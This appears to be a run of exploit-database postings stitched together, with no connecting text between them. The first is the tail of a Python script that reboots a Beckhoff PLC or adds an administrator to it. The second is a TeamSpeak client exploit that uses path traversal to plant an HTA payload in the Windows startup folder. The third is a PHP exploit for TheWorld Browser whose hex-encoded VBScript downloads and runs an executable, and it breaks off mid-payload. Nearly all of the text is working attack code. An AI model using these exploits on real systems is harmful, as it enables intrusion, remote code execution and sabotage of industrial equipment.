        FULLSTRING += chr(0)+chr(0)+chr(0)+chr(0)+chr(0)+chr(0)+chr(0)
        FULLSTRING += chr(len(PASSWORD))
        FULLSTRING += chr(0)+chr(0)+chr(0)
        FULLSTRING += CONCATENATED

        # Encode a first time, but we don't want any '=' signs in the encoded version
        PDATA = base64.b64encode(FULLSTRING)
        if PDATA.endswith('='):
                FULLSTRING += chr(0)
                PDATA = base64.b64encode(FULLSTRING)
        if PDATA.endswith('='):
                FULLSTRING += chr(0)
                PDATA = base64.b64encode(FULLSTRING)

        # Now we have the correct PDATA string
        print 'We will use this string: '+PDATA
        return addUser(UNS, IP, PDATA, IO)

def is_ipv4(ip):
	match = re.match("^(\d{0,3})\.(\d{0,3})\.(\d{0,3})\.(\d{0,3})$", ip)
	if not match:
		return False
	quad = []
	for number in match.groups():
		quad.append(int(number))
	if quad[0] < 1:
		return False
	for number in quad:
		if number > 255 or number < 0:
			return False
	return True

###### START PROGRAM #######
if not len(sys.argv) == 2:
        IP = raw_input("Please enter the IPv4 address of the Beckhoff PLC: ")
else:
        IP = sys.argv[1]
        
if not is_ipv4(IP):
	print "Please go read RFC 791 and then use a legitimate IPv4 address."
	sys.exit()

## Initialize variables
UNS = ''
ActiveRebootIndOff = '1329528576' # Active means active Engineering Licenses (when PLC has been programmed less than a week ago)
InactiveRebootIndOff = '1330577152'
ActiveUserIndOff = '1339031296'
InactiveUserIndOff = '1340079872'

print 'Finding the unique UNS (UUID) of the target system (' + IP + '), hold on...\n'

DISCOVERY_MSG = ('M-SEARCH * HTTP/1.1\r\n' +
                 'HOST: 239.255.255.250:1900\r\n' +
                 'MAN: "ssdp:discover"\r\n' +
                 'MX: 3\r\n' +
                 'ST: upnp:rootdevice\r\n' +
                 '\r\n')

SOCK = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
SOCK.settimeout(10)
SOCK.sendto(DISCOVERY_MSG, (IP, 1900))
try:
        RESPONSE = SOCK.recv(1000).split('\r\n')
except:
        print 'Something went wrong, is the system online?\nTry opening http://' + IP + ':5120/config\n'
        raw_input('Press Enter to continue...')
        sys.exit(0)

for LINE in RESPONSE:
        if ':uuid' in LINE:
                UNS = LINE[9:45]
                print 'Got it: ' + LINE[9:45] + '\n'
SOCK.close()

if not UNS:
        print '\n\nProblem finding UNS, this is full SSDP response: \n'
        for LINE in RESPONSE: print LINE
        input('Press Enter to continue...')
        sys.exit(0)
else:
        print 'Let\'s go, choose your option:'
        print '1 = reboot PLC'
        print '2 = add user tijl with password xiak'
        print '3 = add user from your choosing'
        usr_input = raw_input('Select a number: ')
        if usr_input == '1':
                if not rebootMachine(UNS, IP, InactiveRebootIndOff):
                        rebootMachine(UNS, IP, ActiveRebootIndOff)
                raw_input('Press Enter to continue...')
        elif usr_input == '2':
                if not addUser(UNS, IP, 'GAAAAAQAAAAAAAAABAAAAHRpamx4aWFr', InactiveUserIndOff):
                        addUser(UNS, IP, 'GAAAAAQAAAAAAAAABAAAAHRpamx4aWFr', ActiveUserIndOff)
                raw_input('Press Enter to continue...')
        elif usr_input == '3':
                if not addOwnUser(UNS, IP, InactiveUserIndOff):
                        addOwnUser(UNS, IP, ActiveUserIndOff)
                raw_input('Press Enter to continue...')
        else:
                print 'Please choose a sensible input next time, exiting.'
                input('Press Enter to continue...')
                sys.exit()
HireHackking 
Exploit Title: "PwnSpeak" a 0day Exploit for TeamSpeak Client <= 3.0.18.1 RFI to RCE
Date: 12/10/2015
Author: Scurippio <scurippio@anche.no> / (0x6FB30B11 my pgp keyid) 
Vendor Homepage: https://www.teamspeak.com/ 
Application:  TeamSpeak 3
Version:  TeamSpeak3 Client 3.0.0 - 3.0.18.1
Platforms:  Windows, Mac OS X and Linux
Exploitation: Remote
Risk : Very High

=========
The Bug
=========

The bug is a simple but Critical RFI(Remote File Inclusion), and in my test case on "Windows" you can reach remote code execution. 
By changing the channel description you can insert a [img] bb tag with malicious content.

There are a few problems with the image caching on disk.

1: There is no check on file extension.

2: There is no file renaming, and you can fake the extension so you can create in the cache a malicious executable file like hta, scr, msi, pif, vbs etc. 

	Example:

	[img] http://yourevilhost.com/thefile.hta [/img]
	[img] http://yourevilhost.com/thefile.msi [/img]
	[img] http://yourevilhost.com/thefile.vbs [/img]
	...

3: Teamspeak 3 Client saves the image and recreates the same directory structure as the server where it's hosted.

	Example:

	C:\Users\YourUser\AppData\Roaming\TS3Client\cache\remote\yourevilhost.com\thefile.hta
	C:\Users\YourUser\AppData\Roaming\TS3Client\cache\remote\yourevilhost.com\thefile.msi
	C:\Users\YourUser\AppData\Roaming\TS3Client\cache\remote\yourevilhost.com\thefile.vbs
	...

4: It is possible to do a Directory Traversal with a simple urlencode of the traversal path bypassing the built-in control.
This is the critical hole, if you combine the previous vulnerabilities you can save a malicious file in any path on the OS with the same permissions as Teamspeak client.

	Example:

	[img]http://evildomain.com/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cDesktop%5cOwnedByNonnOreste.hta[/img]

If you set this bbcode on a channel description every user that sees it will download a file named "OwnedByNonnOreste.hta" on their Desktop with 0byte, you can also put images or other file extension!

The built-in image fetcher in the Teamspeak client checks the content type and the file header to check if the response is a real image, but you can easily bypass this control and put your exploit payload.

==========================================
Bypass / Vector / Payload
==========================================
To bypass the control and put arbitrary data in your malicious file you only need a web server and you can easily set the Rewrite rule for the Exploitation.

	Example:
	
	RewriteEngine On
	RewriteCond %{REQUEST_URI} !/faker.php
	RewriteRule .* /faker.php

Then you need to write a simple php script to fake the payload as a png by sending the right content type and file header.

	Example:
	
	<?php
	header ('Content-type: image/png');
	echo "\211PNG\r\n\032\n";
	?>
	<html>
	<head>
	<title>PWN3D</title>
	<HTA:APPLICATION
	  APPLICATIONNAME="OwnedByScurippio"
	  ID="SnappySnappySna"
	  VERSION="1.0"/>

	<script language="VBScript">
		
	   Sub RunProgram
			Set objShell = CreateObject("Wscript.Shell")
			objShell.Run "calc.exe"
		End Sub
		RunProgram
	</script>
	</head>
	</html>

If you save the file in the windows startup directory you can achieve a remote code execution.

	Example:

	[img]http://example.com/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cRoaming%5cMicrosoft%5cWindows%5cStart%20Menu%5cPrograms%5cStartup%5cWelcomeAndOwnedByNonnOreste.hta[/img]
	[img]http://example.com/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cRoaming%5cMicrosoft%5cWindows%5cStart%20Menu%5cPrograms%5cStartup%5cWelcomeAndOwnedByNonnOreste.hta[/img]

The HTA file is a prefect vector for this exploit, you can execute trusted vb script (shell command or anything else) and the png header doesn't compromise the markup language syntax.
At the next OS boot the victim will execute the malicious HTA file.

=======
Fix 
=======

Update to beta channel or wait the 3.0.18.2 hotfix for this exploit!

======
Info 
======

10/20/2015 - I have reported this Vulnerability to Teamspeak developers team  

********* - Release the public exploit

- Fuck the 'Captatori' - Tracciabili

(Snappy is always with you :P )


Copyright (c) 2015 Scurippio

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without mine express
written consent. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please email me for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
HireHackking 
#!/usr/bin/php
<?php
	##########################################################
    # Author         :   Ehsan Noreddini
    # E-Mail         :   me@ehsann.info
    # Social	     :   @prot3ct0r
    # Title          : The World Browser Remote Code Execution
	# TheWorld Browser is a tiny, fast and powerful web Browser. It is completely free. There is no function limitation.
    # Version        :   3.0 Final
	# Date           :   22 October 2015
    # CVE            :   CVE2014-6332
    # Tested on      :   Windows7
	# Download       :   http://theworld.cn/twen/download.html
	# Website        :   http://theworld.cn
    ##########################################################
    # 1. run php code : php exploit.php
    # 2. get the output address and open it in browser !
	##########################################################
	# shot          : http://ehsann.info/proof/The_World_Browser_R_C_E.png
	# Original Code : http://ehsann.info/exploit/4.txt
    ##########################################################
	
	print "TheWorld Browser Remote Code Execution Exploit \r\n";
    $port=80; # Port Address
    $link="http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe"; # Your malicious file
    $socket = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create socket!');
    socket_bind($socket, 0,$port);
    socket_listen($socket);
	# MS14-064
    $msgd = "\x3C\x68\x74\x6D\x6C\x3E\x0D\x0A\x3C\x6D\x65\x74\x61\x20\x68\x74\x74\x70\x2D\x65\x71\x75\x69\x76\x3D\x22\x58\x2D\x55\x41\x2D\x43\x6F\x6D\x70\x61\x74\x69\x62\x6C\x65\x22\x20\x63\x6F\x6E\x74\x65\x6E\x74\x3D\x22\x49\x45\x3D\x45\x6D\x75\x6C\x61\x74\x65\x49\x45\x38\x22\x20\x3E\x0D\x0A\x3C\x68\x65\x61\x64\x3E\x0D\x0A\x3C\x2F\x68\x65\x61\x64\x3E\x0D\x0A\x3C\x62\x6F\x64\x79\x3E\x0D\x0A\x20\x0D\x0A\x3C\x53\x43\x52\x49\x50\x54\x20\x4C\x41\x4E\x47\x55\x41\x47\x45\x3D\x22\x56\x42\x53\x63\x72\x69\x70\x74\x22\x3E\x0D\x0A\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x72\x75\x6E\x6D\x75\x6D\x61\x61\x28\x29\x20\x0D\x0A\x4F\x6E\x20\x45\x72\x72\x6F\x72\x20\x52\x65\x73\x75\x6D\x65\x20\x4E\x65\x78\x74\x0D\x0A\x73\x65\x74\x20\x73\x68\x65\x6C\x6C\x3D\x63\x72\x65\x61\x74\x65\x6F\x62\x6A\x65\x63\x74\x28\x22\x53\x68\x65\x6C\x6C\x2E\x41\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x22\x29\x0D\x0A\x63\x6F\x6D\x6D\x61\x6E\x64\x3D\x22\x49\x6E\x76\x6F\x6B\x65\x2D\x45\x78\x70\x72\x65\x73\x73\x69\x6F\x6E\x20\x24\x28\x4E\x65\x77\x2D\x4F\x62\x6A\x65\x63\x74\x20\x53\x79\x73\x74\x65\x6D\x2E\x4E\x65\x74\x2E\x57\x65\x62\x43\x6C\x69\x65\x6E\x74\x29\x2E\x44\x6F\x77\x6E\x6C\x6F\x61\x64\x46\x69\x6C\x65\x28\x27\x44\x4F\x57\x4E\x4C\x4F\x41\x44\x27\x2C\x27\x6C\x6F\x61\x64\x2E\x65\x78\x65\x27\x29\x3B\x24\x28\x4E\x65\x77\x2D\x4F\x62\x6A\x65\x63\x74\x20\x2D\x63\x6F\x6D\x20\x53\x68\x65\x6C\x6C\x2E\x41\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x29\x2E\x53\x68\x65\x6C\x6C\x45\x78\x65\x63\x75\x74\x65\x28\x27\x6C\x6F\x61\x64\x2E\x65\x78\x65\x27\x29\x3B\x22\x0D\x0A\x73\x68\x65\x6C\x6C\x2E\x53\x68\x65\x6C\x6C\x45\x78\x65\x63\x75\x74\x65\x20\x22\x70\x6F\x77\x65\x72\x73\x68\x65\x6C\x6C\x2E\x65\x78\x65\x22\x2C\x20\x22\x2D\x43\x6F\x6D\x6D\x61\x6E\x64\x20\x22\x20\x26\x20\x63\x6F\x6D\x6D\x61\x6E\x64\x2C\x20\x22\x22\x2C\x20\x22\x72\x75\x6E\x61\x73\x22\x2C\x20\x30\x0D\x0A\x65\x6E\x64\x20\x66\x75\x6E\x63\x74\x69\x6F\x6E\x0D\x0A\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E\x0D\x0A\x20\x0D\x0A\x3C\x53\x43\x52\x49\x50\x54\x20\x4C\x41\x4E\x47\x55\x41\x47\x45\x3D\x22\x56\x42\x53\x63\x72\x69\x70\x74\x22\x3E\x0D\x0A\x20\x20\x0D\x0A\x64\x69\x6D\x20\x20\x20\x61\x61\x28\x29\x0D\x0A\x64\x69\x6D\x20\x20\x20\x61\x62\x28\x29\x0D\x0A\x64\x69\x6D\x20\x20\x20\x61\x30\x0D\x0A\x64\x69\x6D\x20\x20\x20\x61\x31\x0D\x0A\x64\x69\x6D\x20\x20\x20\x61\x32\x0D\x0A\x64\x69\x6D\x20\x20\x20\x61\x33\x0D\x0A\x64\x69\x6D\x20\x20\x20\x77\x69\x6E\x39\x78\x0D\x0A\x64\x69\x6D\x20\x20\x20\x69\x6E\x74\x56\x65\x72\x73\x69\x6F\x6E\x0D\x0A\x64\x69\x6D\x20\x20\x20\x72\x6E\x64\x61\x0D\x0A\x64\x69\x6D\x20\x20\x20\x66\x75\x6E\x63\x6C\x61\x73\x73\x0D\x0A\x64\x69\x6D\x20\x20\x20\x6D\x79\x61\x72\x72\x61\x79\x0D\x0A\x20\x0D\x0A\x42\x65\x67\x69\x6E\x28\x29\x0D\x0A\x20\x0D\x0A\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x42\x65\x67\x69\x6E\x28\x29\x0D\x0A\x20\x20\x4F\x6E\x20\x45\x72\x72\x6F\x72\x20\x52\x65\x73\x75\x6D\x65\x20\x4E\x65\x78\x74\x0D\x0A\x20\x20\x69\x6E\x66\x6F\x3D\x4E\x61\x76\x69\x67\x61\x74\x6F\x72\x2E\x55\x73\x65\x72\x41\x67\x65\x6E\x74\x0D\x0A\x20\x0D\x0A\x20\x20\x69\x66\x28\x69\x6E\x73\x74\x72\x28\x69\x6E\x66\x6F\x2C\x22\x57\x69\x6E\x36\x34\x22\x29\x3E\x30\x29\x20\x20\x20\x74\x68\x65\x6E\x0D\x0A\x20\x20\x20\x20\x20\x65\x78\x69\x74\x20\x20\x20\x66\x75\x6E\x63\x74\x69\x6F\x6E\x0D\x0A\x20\x20\x65\x6E\x64\x20\x69\x66\x0D\x0A\x20\x0D\x0A\x20\x20\x69\x66\x20\x28\x69\x6E\x73\x74\x72\x28\x69\x6E\x66\x6F\x2C\x22\x4D\x53\x49\x45\x22\x29\x3E\x30\x29\x20\x20\x20\x74\x68\x65\x6E\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6E\x74\x56\x65\x72\x73\x69\x6F\x6E\x20\x3D\x20\x43\x49\x6E\x74\x28\x4D\x69\x64\x28\x69\x6E\x66\x6F\x2C\x20\x49\x6E\x53\x74\x72\x28\x69\x6E\x66\x6F\x2C\x20\x22\x4D\x53\x49\x45\x22\x29\x20\x2B\x20\x35\x2C\x20\x32\x29\x29\x20\x20\x20\x0D\x0A\x20\x20\x65\x6C\x73\x65\x0D\x0A\x20\x20\x20\x20\x20\x65\x78\x69\x74\x20\x20\x20\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x65\x6E\x64\x20\x69\x66\x0D\x0A\x20\x0D\x0A\x20\x20\x77\x69\x6E\x39\x78\x3D\x30\x0D\x0A\x20\x0D\x0A\x20\x20\x42\x65\x67\x69\x6E\x49\x6E\x69\x74\x28\x29\x0D\x0A\x20\x20\x49\x66\x20\x43\x72\x65\x61\x74\x65\x28\x29\x3D\x54\x72\x75\x65\x20\x54\x68\x65\x6E\x0D\x0A\x20\x20\x20\x20\x20\x6D\x79\x61\x72\x72\x61\x79\x3D\x20\x20\x20\x20\x20\x20\x20\x20\x63\x68\x72\x77\x28\x30\x31\x29\x26\x63\x68\x72\x77\x28\x32\x31\x37\x36\x29\x26\x63\x68\x72\x77\x28\x30\x31\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x0D\x0A\x20\x20\x20\x20\x20\x6D\x79\x61\x72\x72\x61\x79\x3D\x6D\x79\x61\x72\x72\x61\x79\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28\x33\x32\x37\x36\x37\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28\x30\x29\x0D\x0A\x20\x0D\x0A\x20\x20\x20\x20\x20\x69\x66\x28\x69\x6E\x74\x56\x65\x72\x73\x69\x6F\x6E\x3C\x34\x29\x20\x74\x68\x65\x6E\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x77\x72\x69\x74\x65\x28\x22\x3C\x62\x72\x3E\x20\x49\x45\x22\x29\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x77\x72\x69\x74\x65\x28\x69\x6E\x74\x56\x65\x72\x73\x69\x6F\x6E\x29\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x75\x6E\x73\x68\x65\x6C\x6C\x63\x6F\x64\x65\x28\x29\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x65\x6C\x73\x65\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x65\x74\x6E\x6F\x74\x73\x61\x66\x65\x6D\x6F\x64\x65\x28\x29\x0D\x0A\x20\x20\x20\x20\x20\x65\x6E\x64\x20\x69\x66\x0D\x0A\x20\x20\x65\x6E\x64\x20\x69\x66\x0D\x0A\x65\x6E\x64\x20\x66\x75\x6E\x63\x74\x69\x6F\x6E\x0D\x0A\x20\x0D\x0A\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x42\x65\x67\x69\x6E\x49\x6E\x69\x74\x28\x29\x0D\x0A\x20\x20\x20\x52\x61\x6E\x64\x6F\x6D\x69\x7A\x65\x28\x29\x0D\x0A\x20\x20\x20\x72\x65\x64\x69\x6D\x20\x61\x61\x28\x35\x29\x0D\x0A\x20\x20\x20\x72\x65\x64\x69\x6D\x20\x61\x62\x28\x35\x29\x0D\x0A\x20\x20\x20\x61\x30\x3D\x31\x33\x2B\x31\x37\x2A\x72\x6E\x64\x28\x36\x29\x0D\x0A\x20\x20\x20\x61\x33\x3D\x37\x2B\x33\x2A\x72\x6E\x64\x28\x35\x29\x0D\x0A\x65\x6E\x64\x20\x66\x75\x6E\x63\x74\x69\x6F\x6E\x0D\x0A\x20\x0D\x0A\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x43\x72\x65\x61\x74\x65\x28\x29\x0D\x0A\x20\x20\x4F\x6E\x20\x45\x72\x72\x6F\x72\x20\x52\x65\x73\x75\x6D\x65\x20\x4E\x65\x78\x74\x0D\x0A\x20\x20\x64\x69\x6D\x20\x69\x0D\x0A\x20\x20\x43\x72\x65\x61\x74\x65\x3D\x46\x61\x6C\x73\x65\x0D\x0A\x20\x20\x46\x6F\x72\x20\x69\x20\x3D\x20\x30\x20\x54\x6F\x20\x34\x30\x30\x0D\x0A\x20\x20\x20\x20\x49\x66\x20\x4F\x76\x65\x72\x28\x29\x3D\x54\x72\x75\x65\x20\x54\x68\x65\x6E\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x43\x72\x65\x61\x74\x65\x3D\x54\x72\x75\x65\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x45\x78\x69\x74\x20\x46\x6F\x72\x0D\x0A\x20\x20\x20\x20\x45\x6E\x64\x20\x49\x66\x20\x0D\x0A\x20\x20\x4E\x65\x78\x74\x0D\x0A\x65\x6E\x64\x20\x66\x75\x6E\x63\x74\x69\x6F\x6E\x0D\x0A\x20\x0D\x0A\x73\x75\x62\x20\x74\x65\x73\x74\x61\x61\x28\x29\x0D\x0A\x65\x6E\x64\x20\x73\x75\x62\x0D\x0A\x20\x0D\x0A\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x6D\x79\x64\x61\x74\x61\x28\x29\x0D\x0A\x20\x20\x20\x20\x4F\x6E\x20\x45\x72\x72\x6F\x72\x20\x52\x65\x73\x75\x6D\x65\x20\x4E\x65\x78\x74\x0D\x0A\x20\x20\x20\x20\x20\x69\x3D\x74\x65\x73\x74\x61\x61\x0D\x0A\x20\x20\x20\x20\x20\x69\x3D\x6E\x75\x6C\x6C\x0D\x0A\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6D\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x32\x29\x20\x20\x0D\x0A\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3D\x30\x0D\x0A\x20\x20\x20\x20\x20\x61\x61\x28\x61\x31\x29\x3D\x69\x0D\x0A\x20\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3D\x36\x2E\x33\x36\x35\x39\x38\x37\x33\x37\x34\x33\x37\x38\x30\x31\x45\x2D\x33\x31\x34\x0D\x0A\x20\x0D\x0A\x20\x20\x20\x20\x20\x61\x61\x28\x61\x31\x2B\x32\x29\x3D\x6D\x79\x61\x72\x72\x61\x79\x0D\x0A\x20\x20\x20\x20\x20\x61\x62\x28\x32\x29\x3D\x31\x2E\x37\x34\x30\x38\x38\x35\x33\x34\x37\x33\x31\x33\x32\x34\x45\x2D\x33\x31\x30\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x6D\x79\x64\x61\x74\x61\x3D\x61\x61\x28\x61\x31\x29\x0D\x0A\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6D\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x20\x20\x0D\x0A\x65\x6E\x64\x20\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x0D\x0A\x20\x0D\x0A\x20\x0D\x0A\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x73\x65\x74\x6E\x6F\x74\x73\x61\x66\x65\x6D\x6F\x64\x65\x28\x29\x0D\x0A\x20\x20\x20\x20\x4F\x6E\x20\x45\x72\x72\x6F\x72\x20\x52\x65\x73\x75\x6D\x65\x20\x4E\x65\x78\x74\x0D\x0A\x20\x20\x20\x20\x69\x3D\x6D\x79\x64\x61\x74\x61\x28\x29\x20\x20\x0D\x0A\x20\x20\x20\x20\x69\x3D\x72\x75\x6D\x28\x69\x2B\x38\x29\x0D\x0A\x20\x20\x20\x20\x69\x3D\x72\x75\x6D\x28\x69\x2B\x31\x36\x29\x0D\x0A\x20\x20\x20\x20\x6A\x3D\x72\x75\x6D\x28\x69\x2B\x26\x68\x31\x33\x34\x29\x20\x20\x0D\x0A\x20\x20\x20\x20\x66\x6F\x72\x20\x6B\x3D\x30\x20\x74\x6F\x20\x26\x68\x36\x30\x20\x73\x74\x65\x70\x20\x34\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6A\x3D\x72\x75\x6D\x28\x69\x2B\x26\x68\x31\x32\x30\x2B\x6B\x29\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28\x6A\x3D\x31\x34\x29\x20\x74\x68\x65\x6E\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6A\x3D\x30\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6D\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x32\x29\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x61\x61\x28\x61\x31\x2B\x32\x29\x28\x69\x2B\x26\x68\x31\x31\x63\x2B\x6B\x29\x3D\x61\x62\x28\x34\x29\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6D\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x20\x20\x0D\x0A\x20\x0D\x0A\x20\x20\x20\x20\x20\x6A\x3D\x30\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6A\x3D\x72\x75\x6D\x28\x69\x2B\x26\x68\x31\x32\x30\x2B\x6B\x29\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x45\x78\x69\x74\x20\x66\x6F\x72\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6E\x64\x20\x69\x66\x0D\x0A\x20\x0D\x0A\x20\x20\x20\x20\x6E\x65\x78\x74\x20\x0D\x0A\x20\x20\x20\x20\x61\x62\x28\x32\x29\x3D\x31\x2E\x36\x39\x37\x35\x39\x36\x36\x33\x33\x31\x36\x37\x34\x37\x45\x2D\x33\x31\x33\x0D\x0A\x20\x20\x20\x20\x72\x75\x6E\x6D\x75\x6D\x61\x61\x28\x29\x20\x0D\x0A\x65\x6E\x64\x20\x66\x75\x6E\x63\x74\x69\x6F\x6E\x0D\x0A\x20\x0D\x0A\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x4F\x76\x65\x72\x28\x29\x0D\x0A\x20\x20\x20\x20\x4F\x6E\x20\x45\x72\x72\x6F\x72\x20\x52\x65\x73\x75\x6D\x65\x20\x4E\x65\x78\x74\x0D\x0A\x20\x20\x20\x20\x64\x69\x6D\x20\x74\x79\x70\x65\x31\x2C\x74\x79\x70\x65\x32\x2C\x74\x79\x70\x65\x33\x0D\x0A\x20\x20\x20\x20\x4F\x76\x65\x72\x3D\x46\x61\x6C\x73\x65\x0D\x0A\x20\x20\x20\x20\x61\x30\x3D\x61\x30\x2B\x61\x33\x0D\x0A\x20\x20\x20\x20\x61\x31\x3D\x61\x30\x2B\x32\x0D\x0A\x20\x20\x20\x20\x61\x32\x3D\x61\x30\x2B\x26\x68\x38\x30\x30\x30\x30\x30\x30\x0D\x0A\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x72\x65\x64\x69\x6D\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x20\x0D\x0A\x20\x20\x20\x20\x72\x65\x64\x69\x6D\x20\x20\x20\x61\x62\x28\x61\x30\x29\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x72\x65\x64\x69\x6D\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x32\x29\x0D\x0A\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x74\x79\x70\x65\x31\x3D\x31\x0D\x0A\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3D\x31\x2E\x31\x32\x33\x34\x35\x36\x37\x38\x39\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x30\x0D\x0A\x20\x20\x20\x20\x61\x61\x28\x61\x30\x29\x3D\x31\x30\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x49\x66\x28\x49\x73\x4F\x62\x6A\x65\x63\x74\x28\x61\x61\x28\x61\x31\x2D\x31\x29\x29\x20\x3D\x20\x46\x61\x6C\x73\x65\x29\x20\x54\x68\x65\x6E\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28\x69\x6E\x74\x56\x65\x72\x73\x69\x6F\x6E\x3C\x34\x29\x20\x74\x68\x65\x6E\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6D\x65\x6D\x3D\x63\x69\x6E\x74\x28\x61\x30\x2B\x31\x29\x2A\x31\x36\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6A\x3D\x76\x61\x72\x74\x79\x70\x65\x28\x61\x61\x28\x61\x31\x2D\x31\x29\x29\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28\x28\x6A\x3D\x6D\x65\x6D\x2B\x34\x29\x20\x6F\x72\x20\x28\x6A\x2A\x38\x3D\x6D\x65\x6D\x2B\x38\x29\x29\x20\x74\x68\x65\x6E\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28\x76\x61\x72\x74\x79\x70\x65\x28\x61\x61\x28\x61\x31\x2D\x31\x29\x29\x3C\x3E\x30\x29\x20\x20\x54\x68\x65\x6E\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x49\x66\x28\x49\x73\x4F\x62\x6A\x65\x63\x74\x28\x61\x61\x28\x61\x31\x29\x29\x20\x3D\x20\x46\x61\x6C\x73\x65\x20\x29\x20\x54\x68\x65\x6E\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x74\x79\x70\x65\x31\x3D\x56\x61\x72\x54\x79\x70\x65\x28\x61\x61\x28\x61\x31\x29\x29\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6E\x64\x20\x69\x66\x20\x2